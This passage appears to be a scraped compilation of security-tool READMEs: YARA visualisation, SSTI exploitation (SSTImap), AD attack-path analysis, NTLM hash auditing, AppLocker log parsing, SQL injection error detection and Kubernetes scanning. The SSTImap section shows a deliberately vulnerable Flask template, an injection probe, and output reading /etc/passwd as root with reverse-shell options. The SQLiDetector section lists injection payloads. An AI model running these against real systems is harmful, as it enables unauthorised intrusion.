  4. Display the result of forcing various character encodings upon the matched areas. Several default character encodings will be forcibly attempted in the region around the match. chardet will also be leveraged to see if the bytes fit the pattern of any known encoding. If chardet is confident enough (configurable), an attempt at decoding the bytes using that encoding will be displayed.
  5. Export the matched regions/decodings to SVG, HTML, and colored text files. Show off your ASCII art.

Why It Do

The Yaralyzer's functionality was extracted from The Pdfalyzer when it became apparent that visualizing and decoding pattern matches in binaries had more utility than just in a PDF analysis tool.

YARA, for those who are unaware1, is branded as a malware analysis/alerting tool but it's actually both a lot more and a lot less than that. One way to think about it is that YARA is a regular expression matching engine on steroids. It can locate regex matches in binaries like any regex engine but it can also do far wilder things like combine regexes in logical groups, compare regexes against all 256 XORed versions of a binary, check for base64 and other encodings of the pattern, and more. Maybe most importantly of all YARA provides a standard text based format for people to share their 'roided regexes with the world. All these features are particularly useful when analyzing or reverse engineering malware, whose authors tend to invest a great deal of time into making stuff hard to find.

But... that's also all YARA does. Everything else is up to the user. YARA's just a match engine and if you don't know what to match (or even what character encoding you might be able to match in) it only gets you so far. I found myself a bit frustrated trying to use YARA to look at all the matches of a few critical patterns:

  1. Bytes between escaped quotes (\".+\" and \'.+\')
  2. Bytes between front slashes (/.+/). Front slashes demarcate a regular expression in many implementations and I was trying to see if any of the bytes matching this pattern were actually regexes.

YARA just tells you the byte position and the matched string but it can't tell you whether those bytes are UTF-8, UTF-16, Latin-1, etc. etc. (or none of the above). I also found myself wanting to understand what was going in the region of the matched bytes and not just in the matched bytes. In other words I wanted to scope the bytes immediately before and after whatever got matched.

Enter The Yaralyzer, which lets you quickly scan the regions around matches while also showing you what those regions would look like if they were forced into various character encodings.

It's important to note that The Yaralyzer isn't a full on malware reversing tool. It can't do all the things a tool like CyberChef does and it doesn't try to. It's more intended to give you a quick visual overview of suspect regions in the binary so you can hone in on the areas you might want to inspect with a more serious tool like CyberChef.

Installation

Install it with pipx or pip3. pipx is a marginally better solution as it guarantees any packages installed with it will be isolated from the rest of your local python environment. Of course if you don't really have a local python environment this is a moot point and you can feel free to install with pip/pip3.

pipx install yaralyzer

Usage

Run yaralyze -h to see the command line options (screenshot below).

For info on exporting SVG images, HTML, etc., see Example Output.

Configuration

If you place a filed called .yaralyzer in your home directory or the current working directory then environment variables specified in that .yaralyzer file will be added to the environment each time yaralyzer is invoked. This provides a mechanism for permanently configuring various command line options so you can avoid typing them over and over. See the example file .yaralyzer.example to see which options can be configured this way.

Only one .yaralyzer file will be loaded and the working directory's .yaralyzer takes precedence over the home directory's .yaralyzer.

As A Library

Yaralyzer is the main class. It has a variety of constructors supporting:

  1. Precompiled YARA rules
  2. Creating a YARA rule from a string
  3. Loading YARA rules from files
  4. Loading YARA rules from all .yara file in a directory
  5. Scanning bytes
  6. Scanning a file

Should you want to iterate over the BytesMatch (like a re.Match object for a YARA match) and BytesDecoder (tracks decoding attempt stats) objects returned by The Yaralyzer, you can do so like this:

from yaralyzer.yaralyzer import Yaralyzer

yaralyzer = Yaralyzer.for_rules_files(['/secret/rule.yara'], 'lacan_buys_the_dip.pdf')

for bytes_match, bytes_decoder in yaralyzer.match_iterator():
do_stuff()

Example Output

The Yaralyzer can export visualizations to HTML, ANSI colored text, and SVG vector images using the file export functionality that comes with Rich. SVGs can be turned into png format images with a tool like Inkscape or cairosvg. In our experience they both work though we've seen some glitchiness with cairosvg.

PyPi Users: If you are reading this document on PyPi be aware that it renders a lot better over on GitHub. Pretty pictures, footnotes that work, etc.

Raw YARA match result:

Display hex, raw python string, and various attempted decodings of both the match and the bytes before and after the match (configurable):

Bonus: see what chardet.detect() thinks about the likelihood your bytes are in a given encoding/language:

TODO

  • highlight decodes done at chardets behest
  • deal with repetitive matches


SSTImap - Automatic SSTI Detection Tool With Interactive Interface

 

SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.

This tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation.

Sandbox break-out techniques came from:

This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.


Differences with Tplmap

Even though this software is based on Tplmap's code, backwards compatibility is not provided.

  • Interactive mode (-i) allowing for easier exploitation and detection
  • Base language eval()-like shell (-x) or single command (-X) execution
  • Added new payload for Smarty without enabled {php}{/php}. Old payload is available as Smarty_unsecure.
  • User-Agent can be randomly selected from a list of desktop browser agents using -A
  • SSL verification can now be enabled using -V
  • Short versions added to all arguments
  • Some old command line arguments were changed, check -h for help
  • Code is changed to use newer python features
  • Burp Suite extension temporarily removed, as Jython doesn't support Python3

Server-Side Template Injection

This is an example of a simple website written in Python using Flask framework and Jinja2 template engine. It integrates user-supplied variable name in an unsafe way, as it is concatenated to the template string before rendering.

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
name = request.args.get('name', 'World')
# SSTI VULNERABILITY:
template = f"Hello, {name}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, os=os.name)

if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)

Not only this way of using templates creates XSS vulnerability, but it also allows the attacker to inject template code, that will be executed on the server, leading to SSTI.

$ curl -g 'https://www.target.com/page?name=John'
Hello John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello 49!<br>
OS type: posix

User-supplied input should be introduced in a safe way through rendering context:

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
name = request.args.get('name', 'World')
template = "Hello, {{name}}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, name=name, os=os.name)

if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)

Predetermined mode

SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different templates.

After the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.

To check the URL, you can use -u argument:

$ ./sstimap.py -u https://example.com/page?name=John

╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚═════════════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injecti on: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files

Use --os-shell option to launch a pseudo-terminal on the target.

$ ./sstimap.py -u https://example.com/page?name=John --os-shell

╔══════╦══════╦═══════╗ ▀█▀
║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═
║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __
╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \ / _` | '_ \
╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |
╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\__,_| .__/
│ | |
|_|
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2 Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

To get a full list of options, use --help argument.

Interactive mode

In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use -i argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for settings.

Some commands are used to alter settings between test runs. To run a test, target URL must be supplied via initial -u argument or url command. After that, you can use run command to check URL for SSTI.

If SSTI was found, commands can be used to start the exploitation. You can get the same exploitation capabilities, as in the predetermined mode, but you can use Ctrl+C to abort them without stopping a program.

By the way, test results are valid until target url is changed, so you can easily switch between exploitation methods without running detection test every time.

To get a full list of interactive commands, use command help in interactive mode.

Supported template engines

SSTImap supports multiple template engines and eval()-like injections.

New payloads are welcome in PRs.

Engine RCE Blind Code evaluation File read File write
Mako Python
Jinja2 Python
Python (code eval) Python
Tornado Python
Nunjucks JavaScript
Pug JavaScript
doT JavaScript
Marko JavaScript
JavaScript (code eval) JavaScript
Dust (<= dustjs-helpers@1.5.0) JavaScript
EJS JavaScript
Ruby (code eval) Ruby
Slim Ruby
ERB Ruby
Smarty (unsecured) PHP
Smarty (secured) PHP
PHP (code eval) PHP
Twig (<=1.19) PHP
Freemarker Java
Velocity Java
Twig (>1.19) × × × × ×
Dust (> dustjs-helpers@1.5.0) × × × × ×

Burp Suite Plugin

Currently, Burp Suite only works with Jython as a way to execute python2. Python3 functionality is not provided.

Future plans

If you plan to contribute something big from this list, inform me to avoid working on the same thing as me or other contributors.

  • Make template and base language evaluation functionality more uniform
  • Add more payloads for different engines
  • Short arguments as interactive commands?
  • Automatic languages and engines import
  • Engine plugins as objects of Plugin class?
  • JSON/plaintext API modes for scripting integrations?
  • Argument to remove escape codes?
  • Spider/crawler automation
  • Better integration for Python scripts
  • More POST data types support
  • Payload processing scripts


BlueHound - Tool That Helps Blue Teams Pinpoint The Security Issues That Actually Matter


BlueHound is an open-source tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network
It is a fork of NeoDash, reimagined, to make it suitable for defensive security purposes.

To get started with BlueHound, check out our introductory video, blog post and Nodes22 conference talk.


BlueHound supports presenting your data as tables, graphs, bar charts, line charts, maps and more. It contains a Cypher editor to directly write the Cypher queries that populate the reports. You can save dashboards to your database, and share them with others.

Main Features

  1. Full Automation: The entire cycle of collection, analysis and reporting is basically done with a click of a button.
  2. Community Driven: BlueHound configuration can be exported and imported by others. Sharing of knowledge, best practices, collection methodologies and more, built-into the tool itself.
  3. Easy Reporting: Creating customized report can be done intuitively, without the need to write any code.
  4. Easy Customization: Any custom collection method can be added into BlueHound. Users can even add their own custom parameters or even custom icons for their graphs.

Getting Started

ROST ISO

BlueHound can be used as part of the ROST image, which comes pre-configured with everything you need (BlueHound, Neo4j, BloodHound, and a sample dataset).
To load ROST, create a new virtual machine, and install it from the ISO like you would for a new Windows host.

BlueHound Binary

If you already have a Neo4j instance running, you can download a pre-compiled version of BlueHound from our release page. Just download the zip file suitable to your OS version, extract it, and run the binary.

Using BlueHound

  1. Connect to your Neo4j server
  2. Download SharpHound, ShotHound and the Vulnerability Scanner report parser
  3. Use the Data Import section to collect & import data into your Neo4j database.
  4. Once you have data loaded, you can use the Configurations tab to set up the basic information that is used by the queries (e.g. Domain Admins group, crown jewels servers).
  5. Finally, the Queries section can be used to prepare the reports.

BlueHound How-To

Data Collection

The Data Import Tools section can be used to collect data in a click of a button. By default, BlueHound comes preconfigured with SharpHound, ShotHound, and the Vulnerability Scanners script. Additional tools can be added for more data collection. To get started:

  1. Download the relevant tools using the globe icon
  2. Configure the tool path & arguments for each tool
  3. Run the tools

The built-in tools can be configured to automatically upload the results to your Neo4j instance.

Running & Viewing Queries

To get results for a chart, either use the Refresh icon to run a specific query, or use the Query Runner section to run queries in batches. The results will be cached even after closing BlueHound, and can be run again to get updated results.
Some charts have an Info icon which explain the query and/or provide links to additional information.

Adding & Editing Queries

You can edit the query for new and/or existing charts by using the Settings icon on the top right section of the chart. Here you can use any parameters configured with a Param Select chart, and any Edge Filtering string (see section below).

Edge Filtering

Using the Edge Filtering section, you can filter out specific relationship types for all queries that use the relevant string in their query. For example, ":FILTERED_EDGES" can be used to filter by all the selection filters.
You can also filter by a specific category (see the Info icon) or even define your own custom edge filters.

Import & Export Config

The Export Config and Import Config sections can be used to save & load your dashboard and configurations as a backup, and even shared between users to collaborate and contribute insightful queries to the security community. Don’t worry, your credentials and data won’t be exported.

Note: any arguments for data import tools are also exported, so make sure you remove any secrets before sharing your configuration.

Settings

The Settings section allows you to set some global limits on query execution – maximum query time and a limit for returned results.

Technical Info

BlueHound is a fork of NeoDash, built with React and use-neo4j. It uses charts to power some of the visualizations. You can also extend NeoDash with your own visualizations. Check out the developer guide in the project repository.

Developer Guide

Run & Build using npm

BlueHound is built with React. You'll need npm installed to run the web app.

Use a recent version of npm and node to build BlueHound. The application has been tested with npm 8.3.1 & node v17.4.0.

To run the application in development mode:

  • clone this repository.
  • open a terminal and navigate to the directory you just cloned.
  • execute npm install to install the necessary dependencies.
  • execute npm run dev to run the app in development mode.
  • the application should be available at http://localhost:3000.

To build the app for production:

  • follow the steps above to clone the repository and install dependencies.
  • execute npm run build. This will create a build folder in your project directory.
  • deploy the contents of the build folder to a web server. You should then be able to run the web app.

Questions / Suggestions

We are always open to ideas, comments, and suggestions regarding future versions of BlueHound, so if you have ideas, don’t hesitate to reach out to us at support@zeronetworks.com or open an issue/pull request on GitHub.



GUAC - Aggregates Software Security Metadata Into A High Fidelity Graph Database


Note: GUAC is under active development - if you are interested in contributing, please look at contributor guide and the "express interest" issue

Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph database—normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance.


Conceptually, GUAC occupies the “aggregation and synthesis” layer of the software supply chain transparency logical model:

A few examples of questions answered by GUAC include:

Quickstart

Refer to the Setup + Demo document to learn how to prepare your environment and try GUAC out!

Architecture

Here is an overview of the architecture of GUAC:

Supported input formats

Additional References

Communication

We encourage discussions to be done on github issues. We also have a public slack channel on the OpenSSF slack.

For security issues or code of conduct concerns, an e-mail should be sent to guac-maintainers@googlegroups.com.

Governance

Information about governance can be found here.



DC-Sonar - Analyzing AD Domains For Security Risks Related To User Accounts

DC Sonar Community

Repositories

The project consists of repositories:

Disclaimer

It's only for education purposes.

Avoid using it on the production Active Directory (AD) domain.

Neither contributor incur any responsibility for any using it.

Social media

Check out our Red Team community Telegram channel

Description

Architecture

For the visual descriptions, open the diagram files using the diagrams.net tool.

The app consists of:


Functionallity

The DC Sonar Community provides functionality for analyzing AD domains for security risks related to accounts:

  • Register analyzing AD domain in the app

  • See the statuses of domain analyzing processes

  • Dump and brute NTLM hashes from set AD domains to list accounts with weak and vulnerable passwords

  • Analyze AD domain accounts to list ones with never expire passwords

  • Analyze AD domain accounts by their NTLM password hashes to determine accounts and domains where passwords repeat

Installation

Docker

In progress ...

Manually using dpkg

It is assumed that you have a clean Ubuntu Server 22.04 and account with the username "user".

The app will install to /home/user/dc-sonar.

The next releases maybe will have a more flexible installation.

Download dc_sonar_NNNN.N.NN-N_amd64.tar.gz from the last distributive to the server.

Create a folder for extracting files:

mkdir dc_sonar_NNNN.N.NN-N_amd64

Extract the downloaded archive:

tar -xvf dc_sonar_NNNN.N.NN-N_amd64.tar.gz -C dc_sonar_NNNN.N.NN-N_amd64

Go to the folder with the extracted files:

cd dc_sonar_NNNN.N.NN-N_amd64/

Install PostgreSQL:

sudo bash install_postgresql.sh

Install RabbitMQ:

sudo bash install_rabbitmq.sh

Install dependencies:

sudo bash install_dependencies.sh

It will ask for confirmation of adding the ppa:deadsnakes/ppa repository. Press Enter.

Install dc-sonar itself:

sudo dpkg -i dc_sonar_NNNN.N.NN-N_amd64.deb

It will ask for information for creating a Django admin user. Provide username, mail and password.

It will ask for information for creating a self-signed SSL certificate twice. Provide required information.

Open: https://localhost

Enter Django admin user credentials set during the installation process before.

Style guide

See the information in STYLE_GUIDE.md

Deployment for development

Docker

In progress ...

Manually using Windows host and Ubuntu Server guest

In this case, we will set up the environment for editing code on the Windows host while running Python code on the Ubuntu guest.

Set up the virtual machine

Create a virtual machine with 2 CPU, 2048 MB RAM, 10GB SSD using Ubuntu Server 22.04 iso in VirtualBox.

If Ubuntu installer asks for updating ubuntu installer before VM's installation - agree.

Choose to install OpenSSH Server.

VirtualBox Port Forwarding Rules:

Name Protocol Host IP Host Port Guest IP Guest Port
SSH TCP 127.0.0.1 2222 10.0.2.15 22
RabbitMQ management console TCP 127.0.0.1 15672 10.0.2.15 15672
Django Server TCP 127.0.0.1 8000 10.0.2.15 8000
NTLM Scrutinizer TCP 127.0.0.1 5000 10.0.2.15 5000
PostgreSQL TCP 127.0.0.1 25432 10.0.2.15 5432

Config Window

Download and install Python 3.10.5.

Create a folder for the DC Sonar project.

Go to the project folder using Git for Windows:

cd '{PATH_TO_FOLDER}'

Make Windows installation steps for dc-sonar-user-layer.

Make Windows installation steps for dc-sonar-workers-layer.

Make Windows installation steps for ntlm-scrutinizer.

Make Windows installation steps for dc-sonar-frontend.

Set shared folders

Make steps from "Open VirtualBox" to "Reboot VM", but add shared folders to VM VirtualBox with "Auto-mount", like in the picture below:

After reboot, run command:

sudo adduser $USER vboxsf

Perform logout and login for the using user account.

In /home/user directory, you can use mounted folders:

ls -l
Output:
total 12
drwxrwx--- 1 root vboxsf 4096 Jul 19 13:53 dc-sonar-user-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 10:11 dc-sonar-workers-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 14:25 ntlm-scrutinizer

Config Ubuntu Server

Config PostgreSQL

Install PostgreSQL on Ubuntu 20.04:

sudo apt update
sudo apt install postgresql postgresql-contrib
sudo systemctl start postgresql.service

Create the admin database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: admin
Shall the new role be a superuser? (y/n) y

Create the dc_sonar_workers_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_workers_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the dc_sonar_user_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_user_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the back_workers_db database:

sudo -u postgres createdb back_workers_db

Create the web_app_db database:

sudo -u postgres createdb web_app_db

Run the psql:

sudo -u postgres psql

Set a password for the admin account:

ALTER USER admin WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_workers_layer account:

ALTER USER dc_sonar_workers_layer WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_user_layer account:

ALTER USER dc_sonar_user_layer WITH PASSWORD '{YOUR_PASSWORD}';

Grant CRUD permissions for the dc_sonar_workers_layer account on the back_workers_db database:

\c back_workers_db
GRANT CONNECT ON DATABASE back_workers_db to dc_sonar_workers_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_workers_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_workers_layer;

Grant CRUD permissions for the dc_sonar_user_layer account on the web_app_db database:

\c web_app_db
GRANT CONNECT ON DATABASE web_app_db to dc_sonar_user_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_user_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_user_layer;

Exit of the psql:

\q

Open the pg_hba.conf file:

sudo nano /etc/postgresql/12/main/pg_hba.conf

Add the line for the connection to allow the connection from the host machine to PostgreSQL, save changes and close the file:

# IPv4 local connections:
host all all 127.0.0.1/32 md5
host all admin 0.0.0.0/0 md5

Open the postgresql.conf file:

sudo nano /etc/postgresql/12/main/postgresql.conf

Change specified below params, save changes and close the file:

listen_addresses = 'localhost,10.0.2.15'
shared_buffers = 512MB
work_mem = 5MB
maintenance_work_mem = 100MB
effective_cache_size = 1GB

Restart the PostgreSQL service:

sudo service postgresql restart

Check the PostgreSQL service status:

service postgresql status

Check the log file if it is needed:

tail -f /var/log/postgresql/postgresql-12-main.log

Now you can connect to created databases using admin account and client such as DBeaver from Windows.

Config RabbitMQ

Install RabbitMQ using the script.

Enable the management plugin:

sudo rabbitmq-plugins enable rabbitmq_management

Create the RabbitMQ admin account:

sudo rabbitmqctl add_user admin {YOUR_PASSWORD}

Tag the created user for full management UI and HTTP API access:

sudo rabbitmqctl set_user_tags admin administrator

Open management UI on http://localhost:15672/.

Install Python3.10

Ensure that your system is updated and the required packages installed:

sudo apt update && sudo apt upgrade -y

Install the required dependency for adding custom PPAs:

sudo apt install software-properties-common -y

Then proceed and add the deadsnakes PPA to the APT package manager sources list as below:

sudo add-apt-repository ppa:deadsnakes/ppa

Download Python 3.10:

sudo apt install python3.10=3.10.5-1+focal1

Install the dependencies:

sudo apt install python3.10-dev=3.10.5-1+focal1 libpq-dev=12.11-0ubuntu0.20.04.1 libsasl2-dev libldap2-dev libssl-dev

Install the venv module:

sudo apt-get install python3.10-venv

Check the version of installed python:

python3.10 --version

Output:
Python 3.10.5
Hosts

Add IP addresses of Domain Controllers to /etc/hosts

sudo nano /etc/hosts

Layers

Set venv

We have to create venv on a level above as VM VirtualBox doesn't allow us to make it in shared folders.

Go to the home directory where shared folders located:

cd /home/user

Make deploy steps for dc-sonar-user-layer on Ubuntu.

Make deploy steps for dc-sonar-workers-layer on Ubuntu.

Make deploy steps for ntlm-scrutinizer on Ubuntu.

Config modules

Make config steps for dc-sonar-user-layer on Ubuntu.

Make config steps for dc-sonar-workers-layer on Ubuntu.

Make config steps for ntlm-scrutinizer on Ubuntu.

Run

Make run steps for ntlm-scrutinizer on Ubuntu.

Make run steps for dc-sonar-user-layer on Ubuntu.

Make run steps for dc-sonar-workers-layer on Ubuntu.

Make run steps for dc-sonar-frontend on Windows.

Open https://localhost:8000/admin/ in a browser on the Windows host and agree with the self-signed certificate.

Open https://localhost:4200/ in the browser on the Windows host and login as created Django user.



Get-AppLockerEventlog - Script For Fetching Applocker Event Log By Parsing The Win-Event Log


This script will parse all the channels of events from the win-event log to extract all the log relatives to AppLocker. The script will gather all the important pieces of information relative to the events for forensic or threat-hunting purposes, or even in order to troubleshoot. Here are the logs we fetch from win-event:

  • EXE and DLL,
  • MSI and Script,
  • Packaged app-Deployment,
  • Packaged app-Execution.

The output:

  • The result will be displayed on the screen

  • And, The result will be saved to a csv file: AppLocker-log.csv

The juicy and useful information you will get with this script are:

  • FileType,
  • EventID,
  • Message,
  • User,
  • Computer,
  • EventTime,
  • FilePath,
  • Publisher,
  • FileHash,
  • Package
  • RuleName,
  • LogName,
  • TargetUser.

PARAMETERS

HunType

This parameter specifies the type of events you are interested in, there are 04 values for this parameter:

1. All

This gets all the events of AppLocker that are interesting for threat-hunting, forensic or even troubleshooting. This is the default value.

.\Get-AppLockerEventlog.ps1 -HunType All

2. Block

This gets all the events that are triggered by the action of blocking an application by AppLocker, this type is critical for threat-hunting or forensics, and comes with high priority, since it indicates malicious attempts, or could be a good indicator of prior malicious activity in order to evade defensive mechanisms.

.\Get-AppLockerEventlog.ps1 -HunType Block |Format-Table -AutoSize

3. Allow

This gets all the events that are triggered by the action of Allowing an application by AppLocker. For threat-hunting or forensics, even the allowed applications should be monitored, in order to detect any possible bypass or configuration mistakes.

.\Get-AppLockerEventlog.ps1 -HunType Allow | Format-Table -AutoSize

4. Audit

This gets all the events generated when AppLocker would block the application if the enforcement mode were enabled (Audit mode). For threat-hunting or forensics, this could indicate any configuration mistake, neglect from the admin to switch the mode, or even a malicious action that happened in the audit phase (tuning phase).

 .\Get-AppLockerEventlog.ps1 -HunType Audit

Resource

To better understand AppLocker :

Contributing

This project welcomes contributions and suggestions.



SQLiDetector - Helps You To Detect SQL Injection "Error Based" By Sending Multiple Requests With 14 Payloads And Checking For 152 Regex Patterns For Different Databases


Simple python script supported with BurpBouty profile that helps you to detect SQL injection "Error based" by sending multiple requests with 14 payloads and checking for 152 regex patterns for different databases.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
| S|Q|L|i| |D|e|t|e|c|t|o|r|
| Coded By: Eslam Akl @eslam3kll & Khaled Nassar @knassar702
| Version: 1.0.0
| Blog: eslam3kl.medium.com
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


Description

The main idea for the tool is scanning for Error Based SQL Injection by using different payloads like

'123
''123
`123
")123
"))123
`)123
`))123
'))123
')123"123
[]123
""123
'"123
"'123
\123

And match for 152 error regex patterns for different databases.
Source: https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml

How does it work?

It's very simple, just organize your steps as follows

  1. Use your subdomain grabber script or tools.
  2. Pass all collected subdomains to httpx or httprobe to get only live subs.
  3. Use your links and URLs tools to grab all waybackurls like waybackurls, gau, gauplus, etc.
  4. Use URO tool to filter them and reduce the noise.
  5. Grep to get all the links that contain parameters only. You can use Grep or GF tool.
  6. Pass the final URLs file to the tool, and it will test them.

The final schema of URLs that you will pass to the tool must be like this one

https://aykalam.com?x=test&y=fortest
http://test.com?parameter=ayhaga

Installation and Usage

Just run the following command to install the required libraries.

~/eslam3kl/SQLiDetector# pip3 install -r requirements.txt 

To run the tool itself.

# cat urls.txt
http://testphp.vulnweb.com/artists.php?artist=1

# python3 sqlidetector.py -h
usage: sqlidetector.py [-h] -f FILE [-w WORKERS] [-p PROXY] [-t TIMEOUT] [-o OUTPUT]
A simple tool to detect SQL errors
optional arguments:
-h, --help show this help message and exit]
-f FILE, --file FILE [File of the urls]
-w WORKERS, --workers [WORKERS Number of threads]
-p PROXY, --proxy [PROXY Proxy host]
-t TIMEOUT, --timeout [TIMEOUT Connection timeout]
-o OUTPUT, --output [OUTPUT [Output file]

# python3 sqlidetector.py -f urls.txt -w 50 -o output.txt -t 10

BurpBounty Module

I've created a burpbounty profile that uses the same payloads add injecting them at multiple positions like

  • Parameter name
  • Parameter value
  • Headers
  • Paths

I think it's more effective and will helpful for POST request that you can't test them using the Python script.

How does it test the parameter?

What's the difference between this tool and any other one? If we have a link like this one https://example.com?file=aykalam&username=eslam3kl so we have 2 parameters. It creates 2 possible vulnerable URLs.

  1. It will work for every payload like the following
https://example.com?file=123'&username=eslam3kl
https://example.com?file=aykalam&username=123'
  1. It will send a request for every link and check if one of the patterns is existing using regex.
  2. For any vulnerable link, it will save it at a separate file for every process.

Upcoming updates

  • Output json option.
  • Adding proxy option.
  • Adding threads to increase the speed.
  • Adding progress bar.
  • Adding more payloads.
  • Adding BurpBounty Profile.
  • Inject the payloads in the parameter name itself.

If you want to contribute, feel free to do that. You're welcome :)

Thanks to

Thanks to Mohamed El-Khayat and Orwa for the amazing paylaods and ideas. Follow them and you will learn more

https://twitter.com/Mohamed87Khayat
https://twitter.com/GodfatherOrwa

Stay in touch <3

LinkedIn | Blog | Twitter



Popeye - A Kubernetes Cluster Resource Sanitizer

Popeye - A Kubernetes Cluster Sanitizer

Popeye is a utility that scans live Kubernetes cluster and reports potential issues with deployed resources and configurations. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive overload one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.

Popeye is a readonly tool, it does not alter any of your Kubernetes resources in any way!


Installation

Popeye is available on Linux, OSX and Windows platforms.

  • Binaries for Linux, Windows and Mac are available as tarballs in the release page.

  • For OSX/Unit using Homebrew/LinuxBrew

    brew install derailed/popeye/popeye
  • Building from source Popeye was built using go 1.12+. In order to build Popeye from source you must:

    1. Clone the repo

    2. Add the following command in your go.mod file

      replace (
      github.com/derailed/popeye => MY_POPEYE_CLONED_GIT_REPO
      )
    3. Build and run the executable

      go run main.go

    Quick recipe for the impatient:

    # Clone outside of GOPATH
    git clone https://github.com/derailed/popeye
    cd popeye
    # Build and install
    go install
    # Run
    popeye

PreFlight Checks

